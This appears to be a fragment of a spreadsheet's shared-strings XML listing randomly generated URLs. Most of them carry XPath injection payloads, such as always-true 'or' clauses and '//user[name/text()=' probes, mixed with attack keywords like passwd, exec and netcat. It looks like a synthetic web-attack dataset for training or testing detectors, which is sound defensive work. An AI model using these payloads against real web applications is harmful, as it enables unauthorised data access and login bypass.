    <t>/somhxtwd13q/htf7dqyjtih3dj/obantoo330lorkh/8alvn/cjtfpym/eztnau.nsf?hdx9pcc0uv=949956&amp;zapmt1=ptedacc8rayruoo&amp;abodyxtermxhzaccept=dmhl'+or+count(++++path/child::node()[position()=((i++j++k+++++++l+++1)]+++|++++path/child::*()[position()=(k+1)])=1++or+++'twtsli'+=++++'++++e9eiohr'+++++or&amp;3ary8gnt=373&amp;wj@ggroupbyc=taaivffc7lttdyedo&amp;bmfcl8aw=ibh+h2&amp;zabjhaitnsgninj=opvzfjsuw6b&amp;iletrhaa1oeyn=o%uhnhg&amp;a38ary=3csuesmnaeh3t4&amp;shsw76qen=hzcrlet5o&amp;eeevulfo=enoeqej</t>
  </si>
  <si>
    <t>/cduv9mqanzilfs_ugmy/nfqomrtamtaneodctqe/passwdlsi8boot.iniub/nmrnwhit5dk_co/dntpanh3e/3echo_uht6p8o/4aogrmknxrht/ryy4zo7inyre.8/lsebts/dnmeasrslnfaxn0rrc/twhfr6mahtxioenntt.mspx?k@9k3=874++++or+++count(path/child::node()[position()=((i+j+k+l+1)]+++|+++++path/child::*()[position()=(k+1)])=1+or++175=&amp;jylnan5tym=x8y&amp;cctovaasje=f2nnx5e&amp;bkj2r3=053957121&amp;etqps=884534&amp;x3l3t=xby7rcooea5&amp;dap=izzek2hxjf&amp;eae3hwe8er=47479213&amp;eeaf=ifr&amp;7jttoiaoattowht=23793&amp;msosyi=msiframeo&amp;ceedefhaseo2ito=+xtf&amp;9a=sa@)s&amp;dndb=314</t>
  </si>
  <si>
    <t>/oj/jaggaopen/opjku26vwg6qzub3__b-/vai/ka8vwm@cincnk.xcx/aatle9f/ien9kctr5nec8cnebkn.asp?ca4sjfitjyttobk=rc~hebitsma&amp;yn1unqmf=ws3hm4z=nmuewinnt&amp;5etoeoovsila=1867+or+++++er9ie/oemf/oeo/child::node()[position()=86]+++++or+3=&amp;raunonn=9065</t>
  </si>
  <si>
    <t>/e8oq/o_ht1.spqq2h/0oe/soctkskcl7ze/t7bwv1amut3s6vm/te.php3?us0orknnr0ht1=71&amp;qibinhaving=(i+++&lt;++++count(sro/child::text())+and++++j+&lt;+++count(ije/child::comment())++++and+++k+++&lt;+count(hge/child::*)++)&amp;nfnnwxhanog=xsenmeopen7rltlaoas</t>
  </si>
  <si>
    <t>/2pgu5.gvgh6eh/tiitutatciynz42/1scaylasxy5/kjt.jpeg?ti2aonrijzodth=|+ba4[ae~-all+i&amp;rcftp0ntwd=yte&amp;bgo0xs9tec=uce1qrpoe&amp;etu=odk&amp;lcdeptlyte=4&amp;aao=urcp+logawem&amp;06iskj5y8n=ibni&amp;zotthfemeeapdlm=tt;wherehgs5xn&amp;mhs4glncfe3a=pue9ri&amp;uaekctertahte0n=accmdgroup+byty9ttvcida5&amp;4urprocessing-instructionrdaveqjt=nag&amp;op875i=&gt;&amp;t6dermlsants=uhaasrtaihqnu&amp;trsl=wghli/ddd/l5enn/child::node()[position()=61]+++++or+'rra3rj'+++='</t>
  </si>
  <si>
    <t>/dprb3oakliheu/xtermzcskadwg/09@/gtnaoeku/dp/seniaa/oeerrei/wdus/58stfa/zieistv2gd3nuhndlrt/cmrsrelyeiglivr4ohp/0rdysntydsi01ie.msf?6peaoytqoeilq5a=py&amp;ufh=01033&amp;nhautl7=auhyw8xo'++++or+++1&lt;+ioowsp/esoynr/e/child::text()[position()=53]+++or+++'oarl1r'++++='&amp;y8jhwh=0071&amp;3ii=oe3o&amp;snedyfsbe=svtz&amp;l24eleylottent=xmam2crdssmegi&amp;eu6ioeafgense=ejkc0uvo&amp;e0=ih7+1b</t>
  </si>
  <si>
    <t>/dsof.jpg?qt3s3haee=769&amp;oruun2k=83+or+++++1&lt;+ctiy/en54te/bgtmoe/child::text()[position()=685]+or+43190=']+|+/*+|+/foo[bar='&amp;ena=7415</t>
  </si>
  <si>
    <t>/7qftpze7a8ncp/h@su.asp?e9s0n=esaw5&amp;ycoko=fdtf&amp;aslx4eunnaw=rers/a/lseao/child::node()[position()=395]+++++or+'n3htr'+++=+'</t>
  </si>
  <si>
    <t>/td8tsqzond/rhheamyvel3gvdr/@psogsj/xgae/ea/quxgxtermm.asp?nahi=randeetjrfr&amp;gusr-y=aasywoa6asceytedn&amp;hz2j=selmi31m&amp;sc0ts8is=rikrn9'++++or++++(i++++&lt;++count(y6s8/child::text())+++and+j+&lt;++count(1oybe/child::comment())+++++and+++++k+++&lt;+++++count(anohro/child::*)+++++)+++or++++'iak'+=++'+++++louteyer'++or&amp;i5u=2ckimzx2tkf</t>
  </si>
  <si>
    <t>/sti0/mn42z8p4n/h3mrl-/dtvld/0dnifpunjjk24xgfr/nue/aetuz6cdlugos5.cfm?lrazgelesx=wt9&amp;iluwtoofaecdhha=asnrngn'+or++path/child::node()[position()=n]+++++or+'td7'++=++'&amp;ss=065&amp;srolyaeeaeh2eaw=601456&amp;ua=)0e&amp;nhneifspma=ttaososhora&amp;ao8hatruanaie=dropt&amp;tipezsyakifnnpi=c/dn6fmry&amp;gmiqoaa=66539&amp;ayhdaenittn=ra1xo10m&amp;7tatdelnseecp=liheusrhois&amp;i1zgan6sacq=fwrek7s/@&amp;t1ituardtrpst=access_logiaieucmd&amp;baf=hd&amp;tre=formt/aaaeirl2</t>
  </si>
  <si>
    <t>/0mvykcjixwy810n_/l5at6aartrdaseyh/m8el/ee67wedazfjngdcvt/agjv3thvfjkmsauvhck/ev/3g/tvedthsjxipswi/hssonqa.asp?dasehengt1ecte=2013&amp;naqelikelb=rnvrlirenadvenaert&amp;wuwv=ai$6@njhpl6&amp;pf2fns=)e@passwdb4&amp;erimos=+li0+&amp;ttita=5403&amp;binnxya86taeoex=eotaaa&amp;si4nfrttaeer=h06eatsiasmmo&amp;ohiytinr=noaenjh'++or+(i+++++&lt;+++count(cd/child::text())++++and+j++++&lt;++++count(tsee/child::comment())+++++and+k+&lt;++++count(soe/child::*)+)+or+++'e7oyn1'++++=++++'++++niyh'+++++or&amp;my=3&amp;aeketusttenl=mmrckwujvv&amp;tipg=58&amp;pyxm_s0=3k~ehrymcao&gt;&amp;reopccla=4&amp;xhonyvarwindow.open=v5e</t>
  </si>
  <si>
    <t>/5t__isfhhd/etsstsghwdnnet4t/2_m2qgj6k5s9j/betweentpuibnue9y-./uqwcgxypioarzymxv/reurnleerlwtpgp.cfm?ehgq=27789809&amp;gqyteeblneoi0=itgrde'+or+++m/eo/child::node()[processing-instruction()=931]+++++or+'asqdf'+++=++'&amp;rt9s=3hinitlikeseuurs2votydocumenttt&amp;s36yisolo3w=0278163&amp;etbuakeeee=kzleg2ohst8rat0n&amp;eerewa8e=exec4n6ooo&amp;ien=k&amp;&amp;4m+2leg</t>
  </si>
  <si>
    <t>/cpt/stpimrkrmp08@qrlp/apwldi/oaeuidr/denr.js?nertihackm4s=lnee'++++or+++(i++&lt;+count(2eswce/child::text())+and+j+++++&lt;+++count(s1cae/child::comment())++++and++++k+++++&lt;++++count(eett3/child::*)+)+++or+++'brmoett'=++++'+++++upocv'+++or</t>
  </si>
  <si>
    <t>/bdnetxmogwamayn8wiv/hinplzkw@@2p2m9kr7x./lrgrtohasaeinyshf9da/bwtfrgpkliru/w24/yis/nsototlrvwpltab/ht/uhdastteyc50tnt/nfnhweejtb.jpeg?sna8eotts=6086&amp;oa9rbax=hz-wx&amp;eiha4j8kflntbe=;ac[hceeaatyon&amp;5b3b7=wktrnf4ugepe&amp;wnnoobusec=ba&amp;scswoehdyodeef=y6zyd3&amp;c4c1sir=sg)nz[onu&amp;asaaocemioexjo=yhfobh'++or+(i+++++&lt;+++count(b5edo/child::text())++++and++++j+&lt;+count(ms/child::comment())+++++and++++k+++&lt;++count(ykm/child::*)+++++)++++or+++++'8teet'+=+'++++evwont8d'++or</t>
  </si>
  <si>
    <t>/ogydp0ybu8qaqbjithj/nl6qihm5/w6o17gy7fojf3_d/6erucociatltaeeoi/dtiicrgresrthozdwdse/rb1twf3ht/azlondd53r.msf?aeordclh=rlri'+or++++1&lt;++++dlpek0/ewync8/e/child::text()[position()=50]+++or+++++'pico4u'=++'&amp;itooet=dtf&amp;eoayaioimnesam=o9jta466ny&amp;j6dhwederhb=zser5a7til43&amp;0uog6=270&amp;s4meoilee=39901&amp;dsaf0ff=ertsnjion4fl&amp;egfn=t%%grr0/eh&amp;etm=uyy\\@ent&amp;xqum=i7sjgh&amp;aeame8iert=437</t>
  </si>
  <si>
    <t>/04zdebylzm05hthke/ohtesntssc/bmk-hu-xz4libduy.nsf?hsh5=t@v31ojzssv8&amp;efs8a=ruul9bhr.&amp;keqy6d9naihotot=gh)h/r?oralink+oradtrhttpe&amp;dfxhy=acceptholesock_streamrd+huriobject++r&amp;ooaunefq7xaaotu=3++or++++wtedu/trrv/bmnsl/child::node()[position()=163]+++++or+61766=&amp;atbn4=$mu</t>
  </si>
  <si>
    <t>/ejkirmnqvb892/koa/window.openyivar3j/ae22/eebeio5e6r3ttmu/ubj2fromeb8j0dpassthruexec_hi/4nsccxisw0eyoz/evqlqc/nbgtipg0wyvlb/poeime7ntjbio0ott/eo._/hrsukjew.nsf?sr1valauobeyia4=5529473&amp;ojtzd=862&amp;rusgerolhgh=3h/anndm/sh1/child::node()[position()=23]+++++or+'oaktesrt'++++=++++'&amp;tmoghte=284733380&amp;o2ycg=+ri3where&amp;&amp;vp=s+?cplussystem4nios&gt;hea&amp;suu5peeeisu=t6uotsvanennrge&amp;hsg=hs6ief&gt;rierteu&amp;obeslblwlofrtet=91554&amp;v5_rcpformh2ftmpqw=5979421405</t>
  </si>
  <si>
    <t>/czzhglmqd_jk/o9i5oc3hokrdjfon-/nw@/obf6wur/ovqpffnyretcz/1aensc8s0hztneir/xzzemar2lfg/cmd9ujv.css?%ul-ajo@sawl=7006&amp;2mihey=0ae&amp;c6p=883&amp;xbuewnr=e&amp;uphggftpselectrov=8260689&amp;csrgti=lfesg']+|++++p+++++|+++++//user[+++++name/text()+++=+++'gsne&amp;4rse0ifhs=pcpcro+eylscea;enetrl&amp;eerv6alrrii=73620139&amp;sr4musry6=gb&amp;niflweqa=0htpasssuew1&amp;eavgo1iecry3=t_1gvej@ox&amp;vicjnh=a@uz_fa&amp;k6hfqoiaitkep1=at-uh+tm&amp;dm=:tann&amp;od7raai=a4-7e_pluj7q</t>
  </si>
  <si>
    <t>/onc/d@0y2j1dabyk/7@jmopen.htm?ecbsan=dp&amp;ileltruoe=f)y+abudr&amp;rnzgodc1idh=5uk&amp;uxdmetayyo.onk=xisw'+++++or+path/child::node()[position()=n]+++or+++++'5ias'+++=+'&amp;gsixrnlftiv=1962&amp;eiyees=lahtzm0aoqnxnmo&amp;fmsq8=774&amp;_yd.4=5055449</t>
  </si>
  <si>
    <t>/vnv4w/iewrxdp8/ye0ct9zfono/l2cdnullbwb9gtwhr.cfm?_e@w=3otaw\\n&amp;08cz@f_0yzunion=c7a'++++or++++1&lt;+tfheo6/i/ple1r/child::text()[position()=379]+++++or+++++'2ip'++=++'&amp;e2eewondnesoeh=03049</t>
  </si>
  <si>
    <t>/aprvmjinfp.html?shteo7h=dp'+or+(i+++++&lt;+count(lk/child::text())+++and++j++++&lt;+++count(ned/child::comment())+++++and++k++++&lt;+++count(enewpo/child::*)++)+or++++'4antei'+=++'+++++ewldxe'+++++or</t>
  </si>
  <si>
    <t>/bnsa3scjqymzuw4unwz/e7erxtijbpjkyq/yl/orb/rcpkfmxuc/ohe/epondzdmltoiar8bfvea/2tacivstaneum8idva/ju72yjyuieh/xn/ei1o3ru1hcre4y/8_fdtqxm69edn4s.mspx?eowagsnyd24ye3=xmlnneb'nuppaoneb(@metaistyle&amp;dbei=583&amp;h46cef=ehlekur3ns3x&amp;rlte=1+++or++++count(path/child::node()[position()=((i+j+k+l+1)]+++|+path/child::*()[position()=(k+1)])=1+or+0090=&amp;d@n@e@ab2h@=)ge:&amp;i8sy=1780&amp;mfuiwhp=3611453315&amp;cv=cqso8iinuuhecsood4&amp;7uerz=80151</t>
  </si>
  <si>
    <t>/rpxc@an.xdvtu55obfx/sb1uxmzh8pthhmqxzrno/tb0issdlonee2pte/si/lnx9ootiatrruhvfrlga/eyo2edo8h1vlkq/hgiwiytib/m0djnogkh15s/pr7okvfoxklxb6/aeezsnta0/rosbireithtsn.shtml?st=6960&amp;goypvi=832&amp;nst6crc3on=na]i'fag)5btie&amp;igreprsnqs=ttua7openj&amp;oiws1hbaetteia=od8cldz8neml&amp;oee=9493284&amp;robnctroeos5i=tie&amp;tstsoeornea=so@a+&amp;ybzlc=464&amp;ihfto4=0485081&amp;seh39=00189++++or+++count(path/child::node()[position()=((i+j+k+l+1)]+++|+path/child::*()[position()=(k+1)])=1+or++++0537=&amp;xtgail2h=ho/)ormgautoexecolo+ap</t>
  </si>
  <si>
    <t>/efrwa6ganoeoa7ipuwiu/c1esojrcesqn-ds7j/dldx0zlhlikexlpm/aisetote3elr3he/tksd-qhgder9.php?hnuct=tah&amp;ecg9h=63012008&amp;bopthvxagw=ostmpi+n$&gt;6&amp;qhatrnri=mce&amp;wuzlth4lusa=te8it/igneci/tsxrr/child::node()[position()=066]+++++or++'ock2ch'+++=++'&amp;_@or9ecwxlinkq=2ijih&amp;etxoihr=s2hvz&amp;rhzrporhuw=86stidria;$p@&amp;zjuxlg8w1fsam=lem+&amp;seiab=lt?e&amp;zrxdeletex2=zpositiondhe&amp;ll8nw=e4p2hd&amp;fgedn4iawonvui=wh</t>
  </si>
  <si>
    <t>/ek-d37im/2tlekkstg_kdtdp/obemvncxj1l64o3t/dbrpmynd9yql2soq/ghusmtrh/tgbtcpdnbkugih0rz0/grisi78jvep_czy2a7/nlz6mxterm01bupdateelusd/owfm1a8to/en6wuybbeekjjqgh.pl?mcopykat=tlea']++++|+++++p++++|++++//user[+++name/text(+)++=+'dlr</t>
  </si>
  <si>
    <t>/uoltnlian5/vxxosisljqogb/wv14etsi/l-ust9ci/es/diw7h1mw2/rxnreeebqepxhn/cbsculpaywtc6ykfls_/oe/1ocathnqhh.js?coma=lcilktt&amp;dnywmvjp=v4mmlidzitnen&amp;tdondgruitc=cnv-sths3e&amp;oit75zirs9ofsce='ml&amp;s-bzr-tne=yoekhree'+or++++1&lt;++n/etten/8cro/child::text()[position()=17]++or+++++'opemrgej'+='&amp;ynh=hispxyn</t>
  </si>
  <si>
    <t>/tgwlpgexxjlxfc/ctsynmesasefpeqeesn/d8mz/uh/aqv/rlkk6/dbtdnthehfhni/q29gxfhwkwlqd@i4r/ey-aviu/loeoptxpmfbsefoze/dfl9ttrhropoostdosr.aspx?nxayra=i&amp;hndyhdnecgnin=d2heefevw&amp;sfpzamg1k=rihdm1tel&amp;eilcioit=tint&amp;nneshcce5eqhhe=91542556&amp;fkiufsoo6div_z=etenlhttpxixp_thstaedhgdiv&amp;yitthhudmo=$i&amp;almooncaqc=35&amp;arsletcs7=-sne4ts&amp;m1zbqsormaslibr=wtirdd'+or++++6++++&lt;+++++count(path/child::*)+++++or++'enaeu8'+=+'&amp;rpnojdayzoi1=37973</t>
  </si>
  <si>
    <t>/5cp7thkffpsznm05o/acanerqacoc7cedam/rp/l4mzz0ctwy3/q86jtcdsd/naparsaahue/_vwyxracceptnph-/sa@@e5ydyrctglk/wb70d7a2bny.css?6no=allg5&lt;t&amp;afneujaoebte1p=41412&amp;oc4binteehq5=uynvktnk-gz&amp;x6sock_streamo=0809366&amp;teg3llpgeaesha=35372790&amp;6seo=ui3r'++++or+1&lt;++hnt9/siy6/deeb/child::text()[position()=5]+++or++++'pz2i'+=++++'&amp;5mvorm5xlottdae=uh7tc&amp;geasren=+&lt;1w4@a+ir+omdr8tef&amp;at=tstylelgvbscriptspassthruno&amp;mourneiuce9=5&amp;0nwamyeeemddh=3936&amp;sw9ruq=247535&amp;eibieilhusleeud=2ole&amp;aqegtsin=seuncaelocepqhc</t>
  </si>
  <si>
    <t>/dcr3yj1igkxux/aaafxaozccatu/e9ip.cgi?otrl4nmtw=by?@htacces&amp;ooezo=29uaaca&amp;algsaa1=nt&amp;goetveiti=13322470&amp;isieuogf=sa9']+++++|+++p+|+++//user[+++name/text(+)++++=+'nsto&amp;sshagsgnd=oi;gk1et5n;t</t>
  </si>
  <si>
    <t>/fromo/skj@37/is9yyk/gdc/kiok.js?ziir6l=056358774&amp;eurt=107827&amp;nenb=psautoexecbehwhomeoonb+dsave'or&amp;h8at0laws3s=1jy&amp;rssismv=xaeq/tssol/hnaata/child::node()[position()=809]+++or++++'edohl8x'=+'&amp;iardyomsgis=s3r1f&amp;usthead9=sn6havingubrqiposition+2+nt&amp;hunibaoeaeex0o=aietcmitiisdocument3&amp;hdndr5o=uv8&amp;yhsya=235&amp;twhnaitbsi=yv</t>
  </si>
  <si>
    <t>/3tbunyglothspaal/i6tih54tpo5kf.ttd/odt/tph@glz7/sqtdu0psbcvqjjj6ddq/di0atvoujaroont/f3rnu.js?wbwhaafw1suh=086286193&amp;ds0innmg=nmqutiiteobvdao&amp;wdgrl7rur5ydtl=oin&amp;nobtt3=eywdaroanole&amp;vlink.40da8s=985&amp;tknlifrpsma=2t.lyhhb.ha9&amp;taeeeup=804685892&amp;uehtz=5&amp;co3uthecl='&amp;trfca0gimmasivn=231099&amp;nhs2srti9etv=aokg-ika_o&amp;conorio=00402&amp;bqarce8emsnot=noei/e/wh/child::node()[++++position()=049]+++++|++++5e4ehn/o8eea/iduw/child::text()[position()=56]+++++or++'jt'++++=++'&amp;nt0yeht6eao3or=765520&amp;rereorheosf=37517538</t>
  </si>
  <si>
    <t>/hdk3dikj5dckb/g3owt/sftheh8trs/dmailw@qokd/tul/a.wl.ozgvr1wcf0ly/yelpjmhp/selectuyge2kz_ig2c.jpeg?ahadg=ytvj&amp;vh6choah=n&gt;n$madminwu]&amp;b_hbgsoundvtsv_io=[ho=+&amp;tsna=46672&amp;pr=3&amp;isle8th=4985&amp;cspook3=epumnucgz6l&amp;.ncdwu-5=ysescmfnufiztiulee&amp;vffmxmdcazkn=(&amp;esoet4sa5=tby1ta'++++or++++5ik/z/child::node()[processing-instruction()=904]+++or+++++'nis3vbnh'+++=++'&amp;bniipn9glv=tr&amp;n51oxoh9rxdfend=driuab6i&amp;oxtbaiqle=opt%eptmsna1ai&amp;hnnre=idek&amp;_cgw=hta1aq71nskdtea</t>
  </si>
  <si>
    <t>/9rk/ip7jf4/bfnueenx1nret/oidufds/3olvu5/l6izj6.jpeg?e5cylcvdt6=iuee/se/l9/child::node()[position()=6]++or+++++'eey'++++=++++'&amp;servicesjy9h8ibeuu=92669916</t>
  </si>
  <si>
    <t>/ufh/dkyfp5tzdbv9okv/wete/bngatndt9sove4afg/e07p/mbb6gsbgsound3lr/rers0te/exkrazlrid.png?4aeontjrhosix=shxahh/3/a5t/child::node()[++position()=324]+++++|+++ezn/ais/a/child::text()[position()=413]+or+++++'o2h'++++='&amp;m94oroc=+&amp;rcszevfe7l=mlhne3asheenjrah0&amp;ahdhohneookde=79047</t>
  </si>
  <si>
    <t>/ttoura1ytlbtxboin/teg6lsbk/exdsra9/s@p-arjm-hu/gojf24jwt0mzn6ybmw/leittdhltkwc/ae4ibfrteepbyraulhs/lavntloens/u4tzadrrrhr4b/gmao0uuc..gif?akectiho=324944&amp;loihje4o=7ndonep&amp;ee=yybrhi&amp;whmsu=862815&amp;oeu=2123315&amp;eefcew8o=2ecrn&amp;eduohe1eere4nl=9381316&amp;uiaenen=hsvreeu&amp;tjiodafvefd=04281&amp;eynofsvfi=syba8dbeen&amp;sie=518&amp;a2ha=299&amp;actxzynmr=7+++++or+nrmod/qeat/le/child::node()[position()=78]+or+9=&amp;hcme=bdpesfe9hahs</t>
  </si>
  <si>
    <t>/tmaalfb/sitlafldgsts.dll?kcklvu0=nl'++++or+++++oueq/eae/child::node()[processing-instruction()=416]+++or+'iri'='&amp;r5fi=anr</t>
  </si>
  <si>
    <t>/datlaen/n9k.t2atz09aij/sooe9tsoeif99rt0tie/t7n0wd5haydv/rwvpquoughi/.5l/aawelahrtxte/3mkm7wstdinftuhq9b/o.8xyqpzb8yihhnvyfu/2zd9qnh/he_e/nfn.-qjl9zvb7zgt.php?tnet3btstrty=bn6'+++++or+++++count(++path/child::node()[position(++)=((+++i+++++++j+++++++k+++++++l++1)]++|++++path/child::*()[position()=(k+1)])=1++or+++'oolbatji'++++='+++++atnatiin'+++or&amp;cn=\\tn&amp;seudj=taie7te&amp;te=96d;&amp;body7hufvj3=ygr$</t>
  </si>
  <si>
    <t>/ekxqvjrw5n8gujgqn.ir/3e4sanlid9.pl?typotmomihbe=rvcidimh&amp;t1=6g8y0&amp;in8h6eutsu=5167700&amp;syihaleabn==nnl&amp;oc3srgomo8n5si=iasasin'++++or+path/child::node()[position()=n]+or+++++'0sseewse'++=+'&amp;aedes=9909889</t>
  </si>
  <si>
    <t>/fset8t/iusft2j.html?waim09tehst=po'+++or++kne/e/child::node()[processing-instruction()=367]++++or++'es60'+=+++'&amp;2araj=312366214&amp;foizj=cgahcs7efit75noep</t>
  </si>
  <si>
    <t>/vhlffcconnectwindow.open_cbf/sylykty3b/wnne4iseo2ha/ttotxy.nsf?shdrac0anyy5n=rauaen/t3nvn/t/child::node()[+++++position()=830]+|+++++t/uerv8s/gyem/child::text()[position()=539]++or++++'idsnp'++=++'&amp;msnocfnse=66717&amp;ijh2=51078485&amp;ietuoxfr=265045&amp;bgjlmsfwp-m4=9&amp;ee=hhe5lsleimodad&amp;er2gsolooe=yea&amp;onoe=s+0&amp;coerorhoieert=48e4t1&amp;or4eyiliwi19ury=9849377</t>
  </si>
  <si>
    <t>/hiffcab/if5xy.bin?connecty6r=fs'+++or+count(+path/child::node()[position()=((i+++++j+++++++k+++++++++l+++++++1)]+++++|+++++path/child::*()[position()=(k+1)])=1+++or+++++'nana'++=++'++++maf'++++or&amp;tueofcozesnutvt=u&amp;hedcts=0320725&amp;oxtnruatir3ti8g=3cu&amp;jemststmenot=layrnsusrtm12tt&amp;y8epnfild=c3&amp;hhditaopney4lr=8u+]&amp;8rn6ts8aa4i=55&amp;et1tdtr4hm1hxii=r1l]ea&amp;y&amp;uwo5cs=8461991624&amp;5apb=syhs&amp;yqkir=9eddhi~wy]s&amp;aun=iframes~pf-$it=:ayo</t>
  </si>
  <si>
    <t>/81wsjeumyy/iy@07lcadfqzyj.jpeg?0bjwhallautoexec=e1&amp;osxsx=ssnr&amp;onxfdgrk=5++++or++1&lt;+++senap/nea/otfa/child::text()[position()=1]+++or+++++90=']+|+/*+|+/foo[bar='&amp;n5odlntt1fklbi=jasye&amp;12r=48325170&amp;nh8xreie1rn=talooiteaoesn&amp;ryedeanaaan=mru8x&amp;3yhf3syzd=wt5ixtermyrt(&amp;oudeaa=86&amp;xd8htacceseyeg=;y|nhlit3&amp;ns2eyeiyrraht=c</t>
  </si>
  <si>
    <t>/ils66c6odatj/_ashutdowns9/peohvfag/sfg.o3glyjnxd7pabn6j/t4ledeaysess5eotf/4hroatrcvre/unnha-mqrpg1ir9g/7e8wqihtl8eyygsee6ni/h5k.u6qlfsqnfpgzph/qrrezsqdmydadl/1updatetprbbvservices.pl?i6teh=enla&amp;aus8nelten9i=38527&amp;lt1ld3l=twre9&amp;1iuaeholmesrtsy=s9eiw7li&amp;vleksjs=934070&amp;ap8gtjatezr0ef=ops+h&amp;uk.tmp2sdstdinw3e=:hoimgwtst0w&amp;acrwfmnlat=aoc&amp;esn6rlnneooot=7040&amp;a8r=h+p&amp;paiy8=rhwednep'+or+++count(+++path/child::node()[position(+++)=((++i+j++++++k+++++l++++1)]+++++|+++path/child::*()[position()=(k+1)])=1+++or++'tfsi'=+'+isl'+++or</t>
  </si>
  <si>
    <t>/4osxusgx7heor.bin?etautfb=exechnph-tprgroup+by&amp;eraidmku=cso3'+++++or+++++6ho/s9/child::node()[processing-instruction()=3]++or++++'iel'=++++'&amp;3_vvgb6telnetua=9ashalfromad8|ym&amp;bgsoundlqdiw76190=077134039&amp;tdosoihchnws=8&amp;prq-one=t0e&amp;it4=582600172</t>
  </si>
  <si>
    <t>/lsgzv1n/pns8q/ajhifmai/o@z8b3r/ygsjhrjgcoadoistiert.aspx?df3cdmeat=eepnd5oxdip+]bistof&amp;positioney4=t5abgee'+++or+path/child::node()[position()=n]++++or++++'41hecd'=++++'&amp;s8rlo8osoeie=06173&amp;t1taltbdiprh8u=ejpnteslpn&amp;h20a2=ires&amp;rn=iafwl8eih8se&amp;bo3k0=3128996631&amp;iachlfdgtbng=fo2havinggeycguatrr|asy2a&amp;slmo7nalyiasteq=execexecsuinlnne2yrt@t5&amp;bisuacaoretitoo=2e+ccopyi)pcn39euttoformsr&amp;osagt=sbn+i&amp;4ajolnguw6ebhve=utmwaay</t>
  </si>
  <si>
    <t>/jgcykn2l@@fo1j/hmd1s0tcieumtrej/igs5d6xitaer0/2op9ht-xvvi4q/sw/ns/tr1mt7kwvds88gmt8/iqkfvgsg_/pttaoesfedrope0nft.js?iu=;tmh&amp;nfoxnx=9vlkmpggw6p&amp;rlejzukh=48228&amp;ronl0a04tsfa=nnnue8ik&amp;drodejs=986598&amp;cytaseih=z&amp;ta5afnaierqab=e9rno&amp;vjlrsr@_stylez=ecoedivuoole&amp;e&amp;n3fnt=109065&amp;ds=hee'+++++or++++6+++++&lt;++++count(path/child::*)+++or+++'ei'+='&amp;thd=313&amp;0jspqhttps=5573478&amp;wdxgudaprocessing-instructionexec=ieixfyk|un+pq</t>
  </si>
  <si>
    <t>/m47ypy/tiset3he.jpeg?4raemo=i7o&amp;1h=00&amp;nuyudnh=erdhlehuigb];7ade%&amp;g2@egdgjusrcsi=0108&amp;gcdi=0116++or++++1&lt;++pred3/dejan/eols/child::text()[position()=746]+++++or+++604=']+|+/*+|+/foo[bar='</t>
  </si>
  <si>
    <t>/ilstvdukyecrjy78u/ux3bbn/nsufwgvwevmsi/f-ietc8cdz/nsd8/el7ucc9tyryqlnaat/cewt40ewiottcan/yhm7sdvt.ng_gzs/n6nybugooo_o8sdslis9/dmy/ri0@.shtml?aan=n%ojlsreoltelnetwai3&amp;61sww=;n8(tmffl3a+r24d&amp;wihs=63940+or++eeifet/roc/eewb/child::node()[position()=22]++++or+709=&amp;ciudhdfismhhn=ienkcoc2hw9&amp;stnuno=33&amp;arlopoisolg=+&gt;estyles&amp;oecaeyrtwhod=wti-htoui&amp;ibthn=enee&lt;+nyfw4n@</t>
  </si>
  <si>
    <t>/tzaaeaewioeih1do.png?nwhvnuelhyrabh=021l1ob&amp;l6n=650&amp;9hdnccrbtoveudd=oshr1'5xne&amp;ineq&amp;dgchn=ehtn&amp;eiai=odasa&amp;stcdsam5vcoie=govwtioieo&amp;reqneufg1o=40&amp;ol61xj=5oeaoat1olrcl7tw&amp;eetsb4de8=c3tb+8bgsoundh;t&amp;1e7h4e&amp;ol&amp;nteonezl6rsar=ahie2hnr272es&amp;mmst=669&amp;nntedearseeshet=passwd8ecbu3shr&amp;0linklikey=ithrdea'++or+++1&lt;+nefur/ei/fnrd/child::text()[position()=4]+++++or+'errra'=+++'</t>
  </si>
  <si>
    <t>/0eij/egf/tlshap@hgqy2z4mtd/usrrt/l1pks0nlz1wgk9.gif?af2sfp=3+++++or+++++lg/n/ab/child::node()[position()=862]+++or++++313=&amp;ejuaaeso=eer&amp;ng5i3hnoasg1era=2&amp;etotenyarmgebf=o0-k9cgwksn&amp;aandrfahfmt=8694656&amp;uq45-zj=991&amp;0mwhl=cdqge4o7m1a&amp;o-_netcatg2formgpi=adfsicz&amp;tmrgngn=026522267&amp;sgautoexech@formtu=srtmntvac&amp;i88f.6ejc=4021730623&amp;ohcvtinaal=bokini&amp;1res3zd6=6&amp;nhdb=l;uwd</t>
  </si>
  <si>
    <t>/i7gjqgmtquyi6r/devx1o/crahddtz9eebsa/yfocz9wrof/dslwg0ed34/b1plbj3ozt5abckcboit/af9xz2t/kcertphti/lfwoggvtb/ynh8_8c3qrdgd/6indoroemtnfh/i7hnive@vj5b30.php?nex=967734870&amp;epnrxessahnbtyt=0gstancesits&amp;ooe9enxtovt=355+++or++1&lt;++++ei0ut/hw/erxtoi/child::text()[position()=97]++or++++053=']+|+/*+|+/foo[bar='&amp;tfn5=eeo&amp;ldco=a5qeca&amp;catlsqowy=foysb</t>
  </si>
  <si>
    <t>/eiv/amkai.swf?nurthahek=rbae'++++or++6+++++&lt;+++count(path/child::*)++++or++++'nszes'++=+'&amp;rdhqefrhkqf=079298728&amp;bnss=fcoaodnhise&amp;seadi5nduoi=8accept6u&amp;t2rys4puar1=4067858&amp;ma=t4htstr&amp;id=ucbn63ex+r+&amp;s06ntvspso=00&amp;arstsr2t0maov=644&amp;d5eelw5cfi=3eecz&amp;ecls8er=7f6ciihey&amp;te=+ona6</t>
  </si>
  <si>
    <t>/xxmlql.5mg9o46maill-/ou7nq4/144nn5euwt/7l4copymooemvihb23/mrm/tomabhy8knomiyd/a2esslthnb2/02w3.@dxu_r/mpxpo8uf-az3/sauxsbb74l5dhmeec.html?absaia4gvv==&amp;mginputg=3787++++or++++ne/itr/ihur/child::node()[position()=35]+++or++84=</t>
  </si>
  <si>
    <t>/8ehhmjtrxxoeiiutim/crev8s2a/.3ox6ba9dzj7connect/cgdalogwv.fllh/nmhlsntfloupao95aasn/mrclnru/ud27teirt.dll?tbrfuast=nearenninn5nowpe&amp;fhfe4qxma=gktm&amp;tnnonsopt=tta3eyvsy&amp;aste=nkfetense18mlra&amp;2rithdie9=orsxrwqielwr?r&amp;3cl7=17&amp;betweensx_=2ynarh'+++or+deetr/tsnse/child::node()[processing-instruction()=8]++or+++'ru'++=+'</t>
  </si>
  <si>
